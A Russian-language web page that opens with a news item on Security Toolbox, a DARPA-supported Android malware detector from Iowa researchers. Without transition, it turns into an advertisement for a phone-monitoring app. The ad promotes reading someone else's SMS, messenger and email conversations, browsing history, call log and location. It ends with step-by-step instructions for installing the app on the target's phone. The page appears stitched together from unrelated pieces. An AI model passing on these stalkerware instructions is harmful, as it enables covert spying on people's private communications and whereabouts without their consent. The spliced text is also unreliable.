Разработан новый способ быстрого обнаружения вредоносного ПО для Android

0318c2c8d30cf4f6ec1fb723a380e459Управление перспективных исследований и разработок министерства обороны США оказывает содействие исследователям из штата Айова, которые работают над усовершенствованием безопасности мобильных устройств. Второе место после платформы iOS в Штатах занимает Google Android. Надёжность данной операционной системы у многих вызывает беспокойства и сомнения, поскольку наибольший процент заражений приходится именно на эти телефоны и планшеты.

Новой комплект ПО получил название Security Toolbox. Инструмент предназначается для максимально быстрого выявления вредоносных программ, включённых в состав ядра Android. Для этого используется анализ различных параметров и признаков. Детектирование возможной скрытой активности вирусов становится возможным благодаря общему анализу целостности операционной системы. Проверяется и исполняемый код отдельных программ. Сами разработчики говорят о том, что этот программный анализатор является уникальным, а принцип его действия существенно отличается от существующих мобильных антивирусов. Скорость проверки значительно быстрее.

Концепция «человек в системе управления» позволяет записывать каждое действие пользователя, анализировать установленный софт, проверять программное ядро на предмет целостности. Причём речь идёт не только о встроенных языках программирования, но и о Java-компиляторе. Проверяться будет весь программный код, который может быть сгенерирован при помощи него. Ожидается, что новый метод позволит минимизировать вероятность возникновения ошибки, когда обычное приложение случайно принимается за опасное. Поэтому любая угроза, о которой оповестит Security Toolbox, носит реальный характер.

Тестирование производилось на командах DARPA, а также на специально написанном вредоносном ПО. На данный момент точность распознавания угроз составляет 86%, и этот показатель будет увеличиваться. Даже такое значение существенно выше, чем у большинства мобильных антивирусов. Весомым преимуществом, по заявлению создателей, станет отсутствие необходимости регулярно и ежедневно обновлять базы данных. Кроме вредоносов тестировалась реакция Security Toolbox и на обычные программы. Эффективность оказалась схожей. О массовом распространении такого инструмента речи пока не идёт.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.